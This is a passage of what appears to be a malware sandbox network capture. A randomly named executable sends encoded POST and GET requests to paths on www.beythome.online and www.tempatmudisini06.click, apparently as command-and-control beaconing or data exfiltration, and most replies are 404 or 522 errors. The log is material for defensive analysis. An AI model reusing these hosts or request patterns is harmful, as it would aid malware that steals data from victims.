Jan 11, 2025 09:35:03.932454109 CET	966	IN	HTTP/1.1 522 Date: Sat, 11 Jan 2025 08:35:03 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jukmi%2BZ9AuQ04wWRU%2BsacSbO6eWS%2FpLvkT%2Fa0wnSQVoz5slT3c8DY5LjcZGNLjZWYIUcxmVzpfdnBTACdQ%2FA9k6g1XMDpUOi0I1lYSf8ntyCShn5LQGvAurL2ezCe%2FfMr6uStg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 900391490adb4345-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1593&rtt_var=796&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=545&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49977	85.159.66.93	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:35:09.079046965 CET	822	OUT	POST /80gy/ HTTP/1.1 Host: www.beythome.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 216 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.beythome.online Referer: http://www.beythome.online/80gy/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 58 71 6e 30 66 74 44 65 55 61 4d 36 35 44 48 66 6d 71 4f 44 39 36 6a 70 32 2b 37 4f 64 34 52 53 6a 64 6d 43 74 7a 78 6f 45 32 63 31 41 47 46 42 66 6e 78 42 2b 48 5a 43 4e 58 58 4a 52 6f 38 49 6e 7a 71 52 62 53 74 4f 68 69 58 48 4d 35 6b 68 70 7a 2b 4e 78 4f 4f 71 42 45 67 31 50 51 49 34 6e 54 36 6a 4a 4f 59 62 59 74 64 6b 63 64 36 59 73 46 70 51 72 32 34 5a 6d 42 71 58 77 36 64 74 38 48 65 41 58 61 53 59 56 4a 49 72 68 56 37 6e 55 44 38 68 73 59 73 70 44 4b 38 4b 7a 30 71 35 79 78 49 4e 72 54 35 53 71 32 32 46 30 33 58 39 62 4c 41 77 59 62 44 37 72 36 63 70 6f 51 52 2f 41 52 36 77 36 50 50 76 55 32 52 61 48 46 6b 65 37 77 3d 3d Data Ascii: 40G=Xqn0ftDeUaM65DHfmqOD96jp2+7Od4RSjdmCtzxoE2c1AGFBfnxB+HZCNXXJRo8InzqRbStOhiXHM5khpz+NxOOqBEg1PQI4nT6jJOYbYtdkcd6YsFpQr24ZmBqXw6dt8HeAXaSYVJIrhV7nUD8hsYspDK8Kz0q5yxINrT5Sq22F03X9bLAwYbD7r6cpoQR/AR6w6PPvU2RaHFke7w==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49978	85.159.66.93	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:35:11.629148006 CET	842	OUT	POST /80gy/ HTTP/1.1 Host: www.beythome.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 236 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.beythome.online Referer: http://www.beythome.online/80gy/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 58 71 6e 30 66 74 44 65 55 61 4d 36 36 6a 58 66 71 73 47 44 36 61 6a 6d 71 75 37 4f 54 59 52 57 6a 64 71 43 74 79 31 34 45 45 49 31 48 6a 35 42 65 6a 6c 42 77 6e 5a 43 44 33 58 41 66 49 38 44 6e 7a 32 33 62 51 4a 4f 68 6d 2f 48 4d 34 55 68 6f 41 57 4f 77 65 4f 53 4a 6b 67 33 53 41 49 34 6e 54 36 6a 4a 4b 49 78 59 74 31 6b 63 73 4b 59 75 6b 70 54 6c 57 35 72 6e 42 71 58 30 36 64 32 38 48 65 79 58 59 72 7a 56 50 55 72 68 58 6a 6e 56 53 38 69 6c 59 73 72 4d 71 39 59 2b 78 33 6c 74 42 4d 33 75 68 4a 70 79 6e 4b 38 78 42 57 66 42 70 4d 63 47 4b 37 41 76 34 34 66 2f 32 4d 4b 43 51 2b 6f 33 74 37 4f 4c 42 30 77 4b 58 46 61 74 43 63 52 6d 50 33 31 63 57 51 74 63 4b 56 73 48 61 6d 61 49 75 30 3d Data Ascii: 40G=Xqn0ftDeUaM66jXfqsGD6ajmqu7OTYRWjdqCty14EEI1Hj5BejlBwnZCD3XAfI8Dnz23bQJOhm/HM4UhoAWOweOSJkg3SAI4nT6jJKIxYt1kcsKYukpTlW5rnBqX06d28HeyXYrzVPUrhXjnVS8ilYsrMq9Y+x3ltBM3uhJpynK8xBWfBpMcGK7Av44f/2MKCQ+o3t7OLB0wKXFatCcRmP31cWQtcKVsHamaIu0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49979	85.159.66.93	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:35:14.173233032 CET	1855	OUT	POST /80gy/ HTTP/1.1 Host: www.beythome.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 1248 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.beythome.online Referer: http://www.beythome.online/80gy/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 58 71 6e 30 66 74 44 65 55 61 4d 36 36 6a 58 66 71 73 47 44 36 61 6a 6d 71 75 37 4f 54 59 52 57 6a 64 71 43 74 79 31 34 45 45 77 31 41 52 42 42 65 45 4a 42 78 6e 5a 43 64 6e 58 4e 66 49 38 53 6e 7a 2b 7a 62 51 31 34 68 6b 48 48 4f 61 73 68 76 78 57 4f 36 65 4f 53 57 55 67 79 50 51 49 68 6e 54 71 6e 4a 4f 55 78 59 74 31 6b 63 76 53 59 67 6c 70 54 6e 57 34 5a 6d 42 71 44 77 36 63 34 38 48 32 59 58 65 32 49 56 5a 6b 72 68 33 7a 6e 59 42 55 69 71 59 73 31 41 4b 38 64 2b 78 7a 4d 74 42 51 52 75 6b 63 4d 79 6b 61 38 31 51 4c 54 54 36 51 32 46 72 44 4a 75 5a 38 64 38 47 73 46 49 54 36 54 33 4e 61 71 4f 42 31 52 43 45 4e 50 67 32 4e 48 2f 64 4c 61 46 56 73 6e 54 36 31 6a 5a 4a 2b 48 4d 71 54 6e 55 50 73 47 4f 6b 2b 6f 5a 2b 59 4e 45 65 6d 6a 47 6b 74 4b 44 46 61 42 6e 58 58 67 42 39 6f 57 6e 76 6d 6d 57 79 36 44 30 42 64 6b 36 48 55 32 6b 33 66 51 2f 43 56 59 64 4e 2b 51 50 2b 61 6e 4f 41 45 31 61 66 34 71 2f 4b 69 31 4f 58 39 47 37 75 32 42 4a 39 47 2b 42 71 47 79 6a 4e 72 58 4c 78 5a 2f 6b 72 [TRUNCATED] Data Ascii: 40G=Xqn0ftDeUaM66jXfqsGD6ajmqu7OTYRWjdqCty14EEw1ARBBeEJBxnZCdnXNfI8Snz+zbQ14hkHHOashvxWO6eOSWUgyPQIhnTqnJOUxYt1kcvSYglpTnW4ZmBqDw6c48H2YXe2IVZkrh3znYBUiqYs1AK8d+xzMtBQRukcMyka81QLTT6Q2FrDJuZ8d8GsFIT6T3NaqOB1RCENPg2NH/dLaFVsnT61jZJ+HMqTnUPsGOk+oZ+YNEemjGktKDFaBnXXgB9oWnvmmWy6D0Bdk6HU2k3fQ/CVYdN+QP+anOAE1af4q/Ki1OX9G7u2BJ9G+BqGyjNrXLxZ/krXYacWt45uFuV8M/tWqbG/4BwXkZQzqSaEHi41yM6OBZhvlE9slZTh0X3iklaZhqG1Mezjvw9u+E4HyVsQ9Z4RGHtmOqjeLMpl4gjJTp2G7DAdT8K6+wDfkbm1eyYSAI2gnLrJKXeGh1DSjAXkqlC8ymjQZGOBP/1566ivw9x1xbnPZd49mzGqS3RJTqQOko/qcn0z4X1dJSMpyt8wxvoe0XeZAD3ENYkgj/ssseqkc/dnAjNigVfr3A14CKOiJ+F6nzkLKDIfkiC0mMxFTCryTN4wJjKtL9gEQH06YBLZLl3UAaheLZXo2GTe4q6NuxLV4tT6CtkiP4WnE+ghOR5tZuaVzTminkiuFVKdKEutUJRbpsdmVdMD/a9qfxNqLHsJ5dKA0dFnt1GPzHA3LsuvKjLCjXzoRMGrwDe1FW9Zi/pVIfFgB8nt4YNfl1fWVyS3BKSg+RFZm8wk4JCN0qODctPDwiQPrY8ZpSyMvD4td4B+I56yJLAMvIgFY6sVIuOiipcX793SwMBvlpOoTGC+c4jzldkVnB1c3p43YW2WGmLtRi5+iFUXvJZR8Av63bxKdrcJCNc0/+eercsAXhAKXSWPxVS/KUXHLWTZLpkha3itB9fkhT4t7BO0WQOvdcFOAR5vC7bPMBRr/MDQvGGC0B50onJnu0grg [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49980	85.159.66.93	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:35:16.723042965 CET	547	OUT	GET /80gy/?40G=aoPUcaSQDoEYl3Li+4Czyu/3g+fbTJot1NLErCBtTlAsQjsNV1cN7WJnCGjlbK4CrVmsUH1zx16cR6YNnzS2sPuaP2IeA1YIjk+zZLMvVudzffalj3pTsEAkrCqDu4c/9ECDd62vUbZW&I6=x8CX HTTP/1.1 Host: www.beythome.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Jan 11, 2025 09:35:17.396972895 CET	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Sat, 11 Jan 2025 08:35:17 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2025-01-11T08:35:22.2947743Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49981	103.21.221.4	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:35:22.707036972 CET	843	OUT	POST /0kli/ HTTP/1.1 Host: www.tempatmudisini06.click Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 216 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.tempatmudisini06.click Referer: http://www.tempatmudisini06.click/0kli/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 49 63 49 4d 73 54 61 7a 59 43 4a 65 49 50 64 41 32 43 56 4a 6a 55 6a 77 5a 47 73 65 4b 70 4f 74 6e 37 76 57 54 68 6a 2f 44 56 36 61 4a 63 4f 54 62 6b 49 6a 78 4e 6d 50 4d 30 51 4a 6c 74 7a 65 2f 67 59 31 49 56 56 33 66 6f 32 58 44 63 5a 43 50 5a 6d 76 64 74 74 5a 48 75 37 61 6c 6b 6d 72 33 41 4e 4a 61 38 63 53 39 6b 47 32 53 4d 6b 71 57 6e 32 34 2f 49 4b 56 38 5a 46 7a 59 61 30 52 71 51 58 79 57 74 77 58 4c 52 73 67 55 34 6b 47 52 68 6e 32 43 2f 44 72 56 6a 41 34 71 76 4a 34 56 42 69 65 35 62 53 2f 6e 6c 45 61 66 36 58 52 41 4a 75 53 61 65 49 50 5a 47 7a 64 67 30 78 74 76 37 42 32 34 61 7a 7a 6f 44 74 62 78 66 32 4d 77 51 3d 3d Data Ascii: 40G=IcIMsTazYCJeIPdA2CVJjUjwZGseKpOtn7vWThj/DV6aJcOTbkIjxNmPM0QJltze/gY1IVV3fo2XDcZCPZmvdttZHu7alkmr3ANJa8cS9kG2SMkqWn24/IKV8ZFzYa0RqQXyWtwXLRsgU4kGRhn2C/DrVjA4qvJ4VBie5bS/nlEaf6XRAJuSaeIPZGzdg0xtv7B24azzoDtbxf2MwQ==
Jan 11, 2025 09:35:23.594295025 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Sat, 11 Jan 2025 08:35:23 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49982	103.21.221.4	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:35:25.254322052 CET	863	OUT	POST /0kli/ HTTP/1.1 Host: www.tempatmudisini06.click Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 236 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.tempatmudisini06.click Referer: http://www.tempatmudisini06.click/0kli/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 49 63 49 4d 73 54 61 7a 59 43 4a 65 4a 73 31 41 36 42 39 4a 71 55 69 43 63 47 73 65 54 35 4f 70 6e 37 6a 57 54 6a 50 76 43 6d 4f 61 4f 34 4b 54 59 67 38 6a 32 4e 6d 50 44 55 51 4d 72 4e 79 53 2f 67 55 48 49 58 52 33 66 6f 79 58 44 63 70 43 4f 71 65 73 66 39 74 48 66 65 37 55 34 30 6d 72 33 41 4e 4a 61 2f 68 4a 39 6c 75 32 53 63 30 71 57 46 4f 35 38 49 4b 55 72 70 46 7a 4a 4b 30 56 71 51 57 52 57 76 49 35 4c 54 6b 67 55 39 59 47 53 77 6e 35 4c 2f 44 74 62 44 42 34 69 39 67 72 61 7a 2b 58 33 49 33 72 70 79 55 65 61 4d 57 7a 61 72 69 2b 45 50 77 30 64 45 58 72 33 53 73 59 74 36 46 75 31 34 48 53 33 30 49 78 38 4e 58 49 6d 70 51 55 38 63 6f 64 52 62 2b 42 32 66 39 4a 2f 50 56 41 4b 69 59 3d Data Ascii: 40G=IcIMsTazYCJeJs1A6B9JqUiCcGseT5Opn7jWTjPvCmOaO4KTYg8j2NmPDUQMrNyS/gUHIXR3foyXDcpCOqesf9tHfe7U40mr3ANJa/hJ9lu2Sc0qWFO58IKUrpFzJK0VqQWRWvI5LTkgU9YGSwn5L/DtbDB4i9graz+X3I3rpyUeaMWzari+EPw0dEXr3SsYt6Fu14HS30Ix8NXImpQU8codRb+B2f9J/PVAKiY=
Jan 11, 2025 09:35:26.174616098 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Sat, 11 Jan 2025 08:35:25 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49983	103.21.221.4	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:35:27.796982050 CET	1876	OUT	POST /0kli/ HTTP/1.1 Host: www.tempatmudisini06.click Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 1248 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.tempatmudisini06.click Referer: http://www.tempatmudisini06.click/0kli/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 49 63 49 4d 73 54 61 7a 59 43 4a 65 4a 73 31 41 36 42 39 4a 71 55 69 43 63 47 73 65 54 35 4f 70 6e 37 6a 57 54 6a 50 76 43 6e 32 61 4a 4c 53 54 59 42 38 6a 33 4e 6d 50 4b 30 51 4e 72 4e 79 66 2f 68 39 4d 49 58 63 4d 66 72 61 58 4d 66 52 43 48 37 65 73 57 39 74 48 44 75 37 56 6c 6b 6d 45 33 45 70 46 61 2f 78 4a 39 6c 75 32 53 65 63 71 51 58 32 35 36 49 4b 56 38 5a 46 33 59 61 30 78 71 55 36 76 57 76 4d 48 4c 69 45 67 55 64 6f 47 43 53 50 35 54 76 44 76 57 6a 42 57 69 39 39 7a 61 79 54 35 33 4a 43 77 70 31 67 65 5a 4b 33 34 50 6f 58 6a 57 75 42 76 62 43 7a 70 39 7a 63 38 72 62 35 69 71 49 2f 53 36 45 77 62 6b 64 6a 57 75 38 6f 56 72 4b 4e 73 52 59 4f 6b 6e 5a 59 59 72 76 56 32 51 33 53 39 6d 79 42 48 78 66 43 6b 42 78 5a 71 6d 35 31 6a 39 32 65 4e 72 39 79 6e 39 44 42 62 44 6a 6c 74 43 35 79 58 52 61 41 49 59 70 65 66 71 35 55 63 77 67 70 41 4c 54 71 73 6b 50 33 4c 65 57 35 4a 72 4f 45 41 30 6c 46 51 6b 70 64 39 35 6b 44 74 62 34 68 59 76 75 31 4d 52 67 61 76 52 2f 6f 78 34 47 50 41 31 4a [TRUNCATED] Data Ascii: 40G=IcIMsTazYCJeJs1A6B9JqUiCcGseT5Opn7jWTjPvCn2aJLSTYB8j3NmPK0QNrNyf/h9MIXcMfraXMfRCH7esW9tHDu7VlkmE3EpFa/xJ9lu2SecqQX256IKV8ZF3Ya0xqU6vWvMHLiEgUdoGCSP5TvDvWjBWi99zayT53JCwp1geZK34PoXjWuBvbCzp9zc8rb5iqI/S6EwbkdjWu8oVrKNsRYOknZYYrvV2Q3S9myBHxfCkBxZqm51j92eNr9yn9DBbDjltC5yXRaAIYpefq5UcwgpALTqskP3LeW5JrOEA0lFQkpd95kDtb4hYvu1MRgavR/ox4GPA1JsCrXefUQ2QmLDSWKoDjNgglxdi/CPDexNeBd7yvmr+Kcn0JR2Y2TLNoZyznvze2Z3Q5IfxnL7qbymKr2nDk5yT+TXyajFzoCLfp1dIW2EH0BRh5PkGqfx0qx0zkNRmgMq18L7JL1pAd+TA0tD4NH1widPWYHdsjVs4qJJjosQpNjhEGDVwH6H0jv7rX5BuZuQ8X2v8eOIuNjsYCMkX453b/cqixCwT0hLSRLTMhTVKSZ95AdIWkUqP0vkAZo2adY9YNz0tBqagDxt5CRWnvYqejO0YS3HIjvQnaklFhoeKe65tZaGV4Jo4D5SRw83YDhMXpHDJKaYkxAcw97TGazFX9L/j09Y7u1GJC5vp9+l5pgkWd3rZ0CtspU/N/H2xejKSDB7kFDQlPx+u2ph1/BwEPGjlqfqCyuY7PT6hcZOi5cIXXHbOGzoeHwbIkyr2en4ek7R8gPJxMnfweGyuKNO6txYiUgidIqzRSzF9nJYu7Nmx0CgTQYNaWIXoebJikbDIFdUR7UXDt1ow+M+htUomsQqqq0bItCkYkEv0piWX6iBoHdJngs0k8m2xNgTx83xAnAjf3VxngC4Z7kcdcvfIAhByhkwpW5B0v3HnZVrG1OylDPBEZZA46jWS5jvbntwOXzZJoqcn81P3djw3QZtzZfJ+BzFabVjH [TRUNCATED]
Jan 11, 2025 09:35:28.682796955 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Sat, 11 Jan 2025 08:35:28 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49984	103.21.221.4	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
